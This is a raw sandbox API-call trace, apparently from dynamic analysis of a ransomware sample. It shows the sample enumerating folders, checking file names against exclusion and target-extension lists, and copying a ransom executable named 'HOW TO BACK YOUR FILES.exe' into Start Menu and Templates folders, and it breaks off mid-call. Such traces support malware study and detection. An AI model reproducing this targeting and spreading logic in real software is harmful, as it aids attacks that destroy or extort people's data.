lstrlenW (lpString="tmd") returned 3 [0040.391] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0040.391] lstrlenW (lpString="tps") returned 3 [0040.392] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0040.392] lstrlenW (lpString="trc") returned 3 [0040.392] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.392] lstrlenW (lpString="trc") returned 3 [0040.392] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.392] lstrlenW (lpString="trm") returned 3 [0040.392] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0040.392] lstrlenW (lpString="udb") returned 3 [0040.392] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0040.392] lstrlenW (lpString="udl") returned 3 [0040.392] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0040.392] lstrlenW (lpString="usr") returned 3 [0040.392] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0040.392] lstrlenW (lpString="v12") returned 3 [0040.392] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0040.392] lstrlenW (lpString="vis") returned 3 [0040.392] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0040.392] lstrlenW (lpString="vpd") returned 3 [0040.392] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0040.392] lstrlenW (lpString="vvv") returned 3 [0040.392] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0040.392] lstrlenW (lpString="wdb") returned 3 [0040.392] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0040.392] lstrlenW (lpString="wmdb") returned 4 [0040.392] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0040.392] lstrlenW (lpString="wrk") returned 3 [0040.392] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0040.392] lstrlenW (lpString="xdb") returned 3 [0040.392] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0040.392] lstrlenW (lpString="xld") returned 3 [0040.392] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0040.392] lstrlenW (lpString="xmlff") returned 5 [0040.392] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0040.392] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b82fc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49b82fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0040.393] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0040.393] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b82fc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49b82fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0040.393] FindClose (in: hFindFile=0x2ccfa8 | out: hFindFile=0x2ccfa8) returned 1 [0040.393] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d24a8 [0040.393] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Templates", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Templates") returned="C:\\Users\\Default User\\Templates" [0040.393] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e65e8 | out: hHeap=0x2b0000) returned 1 [0040.393] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24a0 | out: hHeap=0x2b0000) returned 1 [0040.393] lstrlenW (lpString="C:\\Users\\Default User\\Templates") returned 31 [0040.393] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Templates" | out: lpString1="C:\\Users\\Default User\\Templates") returned="C:\\Users\\Default User\\Templates" [0040.393] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.393] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Templates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\templates\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.524] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.524] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Templates\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49c67800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49c67800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.525] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.525] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.525] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.525] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49c67800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49c67800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.525] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.525] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.525] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.525] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.525] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49c67800, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49c67800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0040.525] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0040.525] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49c67800, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49c67800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0040.525] FindClose (in: hFindFile=0x2ccfa8 | out: hFindFile=0x2ccfa8) returned 1 [0040.525] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2488 [0040.525] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Start Menu", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Start Menu") returned="C:\\Users\\Default User\\Start Menu" [0040.525] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee9c0 | out: hHeap=0x2b0000) returned 1 [0040.525] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0040.525] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu") returned 32 [0040.525] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Start Menu" | out: lpString1="C:\\Users\\Default User\\Start Menu") returned="C:\\Users\\Default User\\Start Menu" [0040.525] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.525] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\start menu\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.535] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.535] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Start Menu\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49cb3ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49cb3ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.536] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.536] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.536] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.536] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49cb3ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49cb3ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.536] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.536] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.536] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.536] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.536] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x63dece0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.536] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.536] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0040.536] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0040.536] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0040.536] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0040.536] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0040.536] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0040.536] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0040.536] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0040.536] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0040.536] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0040.536] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0040.536] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0040.536] lstrlenW (lpString="desktop.ini") returned 11 [0040.536] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\*") returned 34 [0040.536] lstrcpyW (in: lpString1=0x2e2e8a2, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.536] lstrlenW (lpString="desktop.ini") returned 11 [0040.536] lstrlenW (lpString="Ares865") returned 7 [0040.536] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.536] lstrlenW (lpString=".dll") returned 4 [0040.536] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.536] lstrlenW (lpString=".lnk") returned 4 [0040.537] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.537] lstrlenW (lpString=".ini") returned 4 [0040.537] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.537] lstrlenW (lpString=".sys") returned 4 [0040.537] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.537] lstrlenW (lpString="desktop.ini") returned 11 [0040.537] lstrlenW (lpString="bak") returned 3 [0040.537] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0040.537] lstrlenW (lpString="ba_") returned 3 [0040.537] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0040.537] lstrlenW (lpString="dbb") returned 3 [0040.537] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0040.537] lstrlenW (lpString="vmdk") returned 4 [0040.537] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0040.537] lstrlenW (lpString="rar") returned 3 [0040.537] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0040.537] lstrlenW (lpString="zip") returned 3 [0040.537] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0040.537] lstrlenW (lpString="tgz") returned 3 [0040.537] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0040.537] lstrlenW (lpString="vbox") returned 4 [0040.537] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0040.537] lstrlenW (lpString="vdi") returned 3 [0040.537] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0040.537] lstrlenW (lpString="vhd") returned 3 [0040.537] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0040.537] lstrlenW (lpString="vhdx") returned 4 [0040.537] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0040.537] lstrlenW (lpString="avhd") returned 4 [0040.537] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0040.537] lstrlenW (lpString="db") returned 2 [0040.537] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0040.537] lstrlenW (lpString="db2") returned 3 [0040.537] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0040.538] lstrlenW (lpString="db3") returned 3 [0040.538] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0040.538] lstrlenW (lpString="dbf") returned 3 [0040.538] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0040.538] lstrlenW (lpString="mdf") returned 3 [0040.538] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0040.538] lstrlenW (lpString="mdb") returned 3 [0040.538] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0040.538] lstrlenW (lpString="sql") returned 3 [0040.538] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0040.538] lstrlenW (lpString="sqlite") returned 6 [0040.538] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0040.538] lstrlenW (lpString="sqlite3") returned 7 [0040.538] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0040.538] lstrlenW (lpString="sqlitedb") returned 8 [0040.538] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0040.538] lstrlenW (lpString="xml") returned 3 [0040.538] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0040.538] lstrlenW (lpString="$er") returned 3 [0040.538] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0040.538] lstrlenW (lpString="4dd") returned 3 [0040.538] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0040.538] lstrlenW (lpString="4dl") returned 3 [0040.538] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0040.538] lstrlenW (lpString="^^^") returned 3 [0040.538] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0040.538] lstrlenW (lpString="abs") returned 3 [0040.538] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0040.538] lstrlenW (lpString="abx") returned 3 [0040.538] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0040.539] lstrlenW (lpString="accdb") returned 5 [0040.539] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0040.539] lstrlenW (lpString="accdc") returned 5 [0040.539] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0040.539] lstrlenW (lpString="accde") returned 5 [0040.539] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0040.539] lstrlenW (lpString="accdr") returned 5 [0040.539] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0040.539] lstrlenW (lpString="accdt") returned 5 [0040.539] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0040.539] lstrlenW (lpString="accdw") returned 5 [0040.539] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0040.539] lstrlenW (lpString="accft") returned 5 [0040.539] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0040.539] lstrlenW (lpString="adb") returned 3 [0040.539] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.539] lstrlenW (lpString="adb") returned 3 [0040.539] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.539] lstrlenW (lpString="ade") returned 3 [0040.539] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0040.539] lstrlenW (lpString="adf") returned 3 [0040.539] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0040.539] lstrlenW (lpString="adn") returned 3 [0040.539] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0040.539] lstrlenW (lpString="adp") returned 3 [0040.539] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0040.539] lstrlenW (lpString="alf") returned 3 [0040.539] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0040.539] lstrlenW (lpString="ask") returned 3 [0040.539] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0040.539] lstrlenW (lpString="btr") returned 3 [0040.539] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0040.540] lstrlenW (lpString="cat") returned 3 [0040.540] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0040.540] lstrlenW (lpString="cdb") returned 3 [0040.540] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0040.540] lstrlenW (lpString="ckp") returned 3 [0040.540] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0040.540] lstrlenW (lpString="cma") returned 3 [0040.540] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0040.540] lstrlenW (lpString="cpd") returned 3 [0040.540] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0040.540] lstrlenW (lpString="dacpac") returned 6 [0040.540] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0040.540] lstrlenW (lpString="dad") returned 3 [0040.540] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0040.540] lstrlenW (lpString="dadiagrams") returned 10 [0040.540] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0040.540] lstrlenW (lpString="daschema") returned 8 [0040.540] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0040.540] lstrlenW (lpString="db-journal") returned 10 [0040.540] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0040.540] lstrlenW (lpString="db-shm") returned 6 [0040.540] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0040.540] lstrlenW (lpString="db-wal") returned 6 [0040.540] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0040.540] lstrlenW (lpString="dbc") returned 3 [0040.540] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0040.540] lstrlenW (lpString="dbs") returned 3 [0040.540] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0040.540] lstrlenW (lpString="dbt") returned 3 [0040.540] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0040.541] lstrlenW (lpString="dbv") returned 3 [0040.541] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0040.541] lstrlenW (lpString="dbx") returned 3 [0040.541] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0040.541] lstrlenW (lpString="dcb") returned 3 [0040.541] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0040.541] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0040.541] lstrcpyW (in: lpString1=0x2e2e8a2, lpString2="Programs" | out: lpString1="Programs") returned="Programs" [0040.541] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs", dwFileAttributes=0x10) returned 1 [0040.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2480 [0040.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x54) returned 0x2cb310 [0040.541] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2488 | out: ListHead=0x2e77d0, ListEntry=0x2d2488) returned 0x2d2468 [0040.541] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 0 [0040.541] FindClose (in: hFindFile=0x2ccfa8 | out: hFindFile=0x2ccfa8) returned 1 [0040.541] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2488 [0040.542] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Start Menu\\Programs", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs") returned="C:\\Users\\Default User\\Start Menu\\Programs" [0040.542] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0040.542] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0040.542] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs") returned 41 [0040.542] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Start Menu\\Programs" | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs") returned="C:\\Users\\Default User\\Start Menu\\Programs" [0040.542] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.542] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\start menu\\programs\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.558] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.558] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49cd9c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49cd9c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.558] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.558] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.558] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.558] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49cd9c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49cd9c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.558] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.558] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.559] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.559] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.559] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d76088a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1 [0040.559] lstrcmpiW (lpString1="Accessories", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.559] lstrcmpiW (lpString1="Accessories", lpString2="aoldtz.exe") returned -1 [0040.559] lstrcmpiW (lpString1="Accessories", lpString2=".") returned 1 [0040.559] lstrcmpiW (lpString1="Accessories", lpString2="..") returned 1 [0040.559] lstrcmpiW (lpString1="Accessories", lpString2="windows") returned -1 [0040.559] lstrcmpiW (lpString1="Accessories", lpString2="bootmgr") returned -1 [0040.559] lstrcmpiW (lpString1="Accessories", lpString2="temp") returned -1 [0040.559] lstrcmpiW (lpString1="Accessories", lpString2="pagefile.sys") returned -1 [0040.559] lstrcmpiW (lpString1="Accessories", lpString2="boot") returned -1 [0040.559] lstrcmpiW (lpString1="Accessories", lpString2="ids.txt") returned -1 [0040.559] lstrcmpiW (lpString1="Accessories", lpString2="ntuser.dat") returned -1 [0040.559] lstrcmpiW (lpString1="Accessories", lpString2="perflogs") returned -1 [0040.559] lstrcmpiW (lpString1="Accessories", lpString2="MSBuild") returned -1 [0040.559] lstrlenW (lpString="Accessories") returned 11 [0040.559] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\*") returned 43 [0040.559] lstrcpyW (in: lpString1=0x2e2e8b4, lpString2="Accessories" | out: 